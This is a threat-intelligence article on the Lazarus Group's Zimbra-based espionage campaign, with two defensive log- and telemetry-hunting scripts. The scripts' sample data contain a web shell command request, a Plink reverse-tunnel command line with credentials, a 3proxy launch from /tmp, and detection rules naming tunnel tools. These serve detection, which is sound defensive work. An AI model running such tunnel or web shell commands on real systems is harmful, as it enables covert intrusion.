The Lazarus Group, a North Korean hacking group, recently ran a cyber espionage campaign against organizations in the medical and energy sectors. Tracked as the "No Pineapple!" campaign, the operation ran from August to November 2022. The group gained its initial foothold by exploiting vulnerabilities in the victims' internet-facing Zimbra mail servers. The campaign was attributed to the Lazarus Group by the cybersecurity firm WithSecure. Notably, the group used new tradecraft, including command-and-control infrastructure hosted on bare IP addresses with no domain names and an updated version of its malware. To keep access through the victims' firewalls it used tunneling tools to set up reverse tunnels from compromised hosts out to its own servers. Over the course of the intrusion the group extracted roughly 5 gigabytes of email messages and around 100GB of data from the victim organization. Operational mistakes, however, gave the intrusion away: a connection to a North Korean IP address and the accidental exposure of the group's web shell implant. This article gives an overview of the Lazarus Group, the tactics and methods used in this campaign, how the operation was attributed, and the impact of the data theft on the medical and energy sectors.
Key Takeaways
- Lazarus Group targeted organizations in the medical research, healthcare, chemical engineering, energy, defense, and leading research university sectors.
- The group exploited two vulnerabilities in the Zimbra mail server: CVE-2022-27925 (remote code execution through a path traversal in the mailbox import function, which lets an uploaded ZIP archive write files outside the intended directory) and CVE-2022-37042 (an authentication bypass that let the vulnerable import endpoint be reached without valid credentials).
- Lazarus Group used the tunneling tools Plink and 3Proxy to create reverse tunnels out through the victims' firewalls, giving the operators a covert, persistent path back into the network.
- The group extracted around 5 gigabytes of email messages from the server, stored them in a CSV file locally, and uploaded them to their own server.
Lazarus Group Overview
The Lazarus Group, a North Korean hacking group, has targeted organizations across medical research, healthcare, chemical engineering, energy, defense and leading research universities in its No Pineapple! cyber espionage campaign. Its tradecraft in this campaign combined the exploitation of known vulnerabilities in the Zimbra mail server with continually updated tooling. The group is known for stealing email and other data; this intrusion lasted for more than two months and resulted in the theft of around 100GB of data from victim organizations. Attribution was not straightforward, but a connection to a North Korean IP address (175.45.176[.]27) and the accidental exposure of a web shell implant eventually allowed the campaign to be tied to the Lazarus Group.
Tactics and Methods
Exploiting vulnerabilities in a mail server gave the group its way in; a range of follow-on tactics turned that foothold into long-term, covert access. The initial intrusion targeted two weaknesses in the internet-facing Zimbra mail server: CVE-2022-27925, a remote code execution flaw in the mailbox import function (a path traversal in the handling of uploaded ZIP archives lets an attacker write files into the web application directory), and CVE-2022-37042, an authentication bypass that allowed the vulnerable import endpoint to be reached without valid credentials. Chained together, the two flaws let an unauthenticated attacker drop a web shell on the mail server, and that web shell is what gave the Lazarus Group its persistent foothold in the compromised networks. From there the group used the tunneling tools Plink and 3Proxy to create reverse tunnels: the compromised host connects outbound to attacker-controlled infrastructure, and the operators use that connection to reach internal services that the firewall would otherwise block from the internet, which both evades perimeter controls and keeps their presence quiet. These tactics and methods facilitated the extraction of a significant volume of email, roughly 5 gigabytes, which was written to a local CSV file before being uploaded to the threat actors' server.
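The defensive counterpart of the two Zimbra bugs is a hunt over the mail server's proxy access log. The script below is an added example written for this article; it is not code from WithSecure's report or from the Zimbra project. It assumes the Zimbra nginx proxy writes a standard combined-format access log, it uses the publicly documented mboximport servlet path as the indicator for CVE-2022-27925 and CVE-2022-37042 exploitation attempts, and every log line, IP address and JSP file name in it is constructed for the example rather than taken from a real incident. It flags every POST to the import servlet, notes whether the server processed it (a 2xx rather than a 401), and then treats any JSP that is requested for the first time after the earliest such POST as a candidate web shell.

```python
import re
from datetime import datetime

# Combined log format as written by an nginx reverse proxy. Only the fields
# this hunt needs are captured; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Servlet abused by CVE-2022-27925 (path traversal in the mailbox-import ZIP
# handler) and CVE-2022-37042 (authentication bypass on the same servlet).
MBOXIMPORT = "/service/extension/backup/mboximport"

# Constructed sample (not real incident data): an internal admin host uses a
# legitimate JSP before the attack, an external host POSTs to mboximport
# without success, another external host gets a 200, and a JSP that never
# existed before then starts answering requests.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Aug/2022:09:10:00 +0000] "GET /public/launchNewWindow.jsp HTTP/1.1" 200 40
203.0.113.7 - - [10/Aug/2022:09:14:02 +0000] "GET /zimbra/ HTTP/1.1" 200 1520
203.0.113.7 - - [10/Aug/2022:09:14:03 +0000] "POST /service/extension/backup/mboximport HTTP/1.1" 401 0
198.51.100.23 - - [10/Aug/2022:09:15:05 +0000] "POST /service/extension/backup/mboximport HTTP/1.1" 200 0
198.51.100.23 - - [10/Aug/2022:09:15:20 +0000] "GET /public/jsp/sample_shell.jsp?cmd=id HTTP/1.1" 200 83
10.0.0.5 - - [10/Aug/2022:09:20:00 +0000] "GET /public/launchNewWindow.jsp HTTP/1.1" 200 40
"""


def parse(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["status"] = int(d["status"])
    d["path"] = d["path"].split("?", 1)[0]  # drop the query string
    return d


def hunt_access_log(lines):
    """Flag mboximport POSTs and JSPs that first appear after the earliest one."""
    events = sorted((e for e in map(parse, lines) if e), key=lambda e: e["ts"])
    findings = []
    attempts = [e for e in events
                if e["method"] == "POST" and e["path"] == MBOXIMPORT]
    for e in attempts:
        findings.append({
            "rule": "mboximport_post",
            "ip": e["ip"],
            "ts": e["ts"],
            # A 2xx means the servlet processed the upload (auth bypass or a
            # real admin session); a 401 is a failed attempt, still worth noting.
            "processed": 200 <= e["status"] < 300,
        })
    if not attempts:
        return findings
    t0 = attempts[0]["ts"]
    # JSPs requested before any exploitation attempt are the baseline of
    # known application pages; anything new after t0 is suspicious.
    baseline = {e["path"] for e in events
                if e["path"].endswith(".jsp") and e["ts"] < t0}
    reported = set()
    for e in events:
        if (e["ts"] >= t0 and e["path"].endswith(".jsp")
                and e["path"] not in baseline and e["path"] not in reported):
            reported.add(e["path"])
            findings.append({"rule": "new_jsp_after_mboximport",
                             "ip": e["ip"], "ts": e["ts"], "path": e["path"]})
    return findings


if __name__ == "__main__":
    for finding in hunt_access_log(SAMPLE_LOG.splitlines()):
        print(finding)
```

On the sample the hunt reports both import POSTs (only the second one processed) and the single JSP that appears after the first attempt; the legitimate page seen before the attack is not flagged. On a real server the baseline should come from a longer history than one log file, and a hit on the import servlet from any address that is not a known administrator host deserves a look even when it returned 401.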
Data Extraction and Attribution
Using its access to the Zimbra mail server, the group pulled a large volume of email from the targeted organization, staging the data locally before uploading it to its own server. Roughly 5 gigabytes of email messages were extracted from the server and written to a CSV file for exfiltration. The intrusion lasted for more than two months, during which the threat actors kept persistent access to the network. Their own mistakes, however, undid them: a connection to a North Korean IP address and the accidental exposure of the web shell implant led investigators to attribute the campaign to the Lazarus Group. The case illustrates how difficult attribution usually is, and how much it can depend on the adversary slipping up.
| Data extraction techniques | Attribution challenges and clues |
|---|---|
| Exploitation of Zimbra mail server vulnerabilities | Difficulty in identifying the origin of the attacks |
| Local storage in a CSV file and upload to the threat actors' server | Accidental exposure of the web shell implant |
| Extraction of approximately 5 gigabytes of email messages | Communication with a North Korean IP address |
| Persistent access to the network for over two months | Attribution of the campaign to the Lazarus Group |
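The network side of this intrusion leaves its own traces: the reverse tunnels are set up by Plink with a remote forward, 3Proxy is started from an unusual location, and the command-and-control servers are reached by bare IP address with no DNS lookup beforehand, one of them the North Korean address named above. The script below is an added example written for this article, not code from WithSecure or any vendor. It assumes host telemetry has been exported to a simple JSON-lines shape (process starts, DNS answers and outbound connections), which is a constructed schema rather than any product's real format; all timestamps, commands and addresses in it are constructed, except 175.45.176.27, which is the address the report names. It flags tunnel-tool command lines, connections to that known address, and external connections to addresses that no DNS answer on the host ever returned.

```python
import ipaddress
import json

# Address named in the WithSecure report as the North Korean IP the operators
# connected to. Any further entries here would come from your own threat intel.
KNOWN_C2 = {"175.45.176.27"}

# Treated as internal; everything else counts as external. The RFC 5737
# documentation ranges used in the sample therefore count as external.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed telemetry (not real incident data, not a vendor schema): a
# normal update check, then Plink opening a reverse tunnel to an external
# SSH server, 3Proxy started from /tmp, and a connection to the known address.
SAMPLE_EVENTS = r"""
{"ts": "2022-08-12T01:02:03Z", "type": "dns", "query": "updates.example.com", "answers": ["93.184.216.34"]}
{"ts": "2022-08-12T01:02:04Z", "type": "conn", "dst": "93.184.216.34", "dport": 443}
{"ts": "2022-08-12T01:05:00Z", "type": "process", "cmd": "C:\\Windows\\Temp\\plink.exe -ssh -l user -pw p4ss -R 8443:127.0.0.1:3389 -N 192.0.2.10"}
{"ts": "2022-08-12T01:05:01Z", "type": "conn", "dst": "192.0.2.10", "dport": 22}
{"ts": "2022-08-12T01:06:00Z", "type": "process", "cmd": "/tmp/3proxy /tmp/3proxy.cfg"}
{"ts": "2022-08-12T01:07:00Z", "type": "conn", "dst": "175.45.176.27", "dport": 443}
{"ts": "2022-08-12T01:08:00Z", "type": "conn", "dst": "10.0.0.25", "dport": 445}
"""


def is_external(ip):
    """True for any address outside the INTERNAL ranges."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL)


def tunnel_indicators(cmd):
    """Describe cmd if it looks like reverse-tunnel or proxy setup, else None.

    Plain whitespace splitting is enough for the constructed sample; quoted
    arguments in real telemetry would need a proper tokenizer.
    """
    argv = cmd.split()
    if not argv:
        return None
    exe = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe in ("plink.exe", "plink", "ssh", "ssh.exe"):
        # -R listen:host:port asks the remote SSH server to listen on its side
        # and forward back into the victim: an inbound path riding an
        # outbound connection, so the firewall never sees a new inbound flow.
        for i, tok in enumerate(argv):
            if tok == "-R" and i + 1 < len(argv):
                return f"{exe} reverse tunnel {argv[i + 1]}"
    if exe.startswith("3proxy"):
        return f"{exe} started with {' '.join(argv[1:])}"
    return None


def hunt_host_telemetry(lines):
    """Flag tunnel tools, known C2, and external connections never seen in DNS."""
    events = [json.loads(line) for line in lines if line.strip()]
    # Every address any DNS answer returned on this host. A production hunt
    # would window this in time; for the example a flat set is enough.
    resolved = set()
    for e in events:
        if e["type"] == "dns":
            resolved.update(e["answers"])
    findings = []
    for e in events:
        if e["type"] == "process":
            detail = tunnel_indicators(e["cmd"])
            if detail:
                findings.append({"rule": "tunnel_tool", "ts": e["ts"], "detail": detail})
        elif e["type"] == "conn" and is_external(e["dst"]):
            if e["dst"] in KNOWN_C2:
                findings.append({"rule": "known_c2", "ts": e["ts"], "detail": e["dst"]})
            elif e["dst"] not in resolved:
                # Bare-IP C2: the host talked to a public address it never
                # resolved, the pattern noted for this campaign's infrastructure.
                findings.append({"rule": "bare_ip_egress", "ts": e["ts"], "detail": e["dst"]})
    return findings


if __name__ == "__main__":
    for finding in hunt_host_telemetry(SAMPLE_EVENTS.splitlines()):
        print(finding)
```

The update check is not reported because its address came back from a DNS answer, while the SSH server behind the Plink tunnel is reported as bare-IP egress even before any intel names it. The bare-IP rule is noisy on hosts that legitimately talk to hard-coded addresses, so in practice it is scored alongside the tunnel-tool and known-C2 hits rather than alerted on alone.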
Frequently Asked Questions
What are some other industries that Lazarus Group has targeted in the past?
The Lazarus Group has previously targeted the financial and government sectors, among others, so its range of targets extends well beyond the medical and energy organizations hit in this campaign.
How did Lazarus Group exploit the vulnerabilities in the Zimbra mail server?
The Lazarus Group used two flaws in the internet-facing Zimbra mail server: CVE-2022-27925, a remote code execution bug in the mailbox import feature, and CVE-2022-37042, an authentication bypass that let the vulnerable endpoint be reached without credentials. Chained together they allowed an unauthenticated attacker to run code on the mail server and, from that foothold, move into the rest of the network.
What are some new developments in the tactics and methods of Lazarus Group?
The Lazarus Group keeps evolving its tactics and tooling. In this campaign it hosted its infrastructure on bare IP addresses without domain names and used updated versions of its Dtrack info-stealer and GREASE malware. These changes show how readily the group adapts its tradecraft between campaigns.
How did Lazarus Group maintain persistent access to the network?
The Zimbra mail server vulnerabilities, CVE-2022-27925 (Remote Code Execution) and CVE-2022-37042 (Authentication Bypass), gave the Lazarus Group its initial access and let it plant a web shell on the mail server. Persistence then came from that web shell and from reverse tunnels built with the tunneling tools Plink and 3Proxy, which carried the operators' traffic out through the firewall instead of relying on inbound connections that the firewall would block.
How did the investigation reveal the North Korean attribution of the hacking campaign?
Investigators observed the intrusion communicating with a North Korean IP address (175.45.176[.]27), which pointed directly at an operator in North Korea. Together with the accidentally exposed web shell implant and the use of tooling already associated with the group, such as updated versions of the Dtrack info-stealer and GREASE, this led WithSecure to attribute the campaign to the Lazarus Group.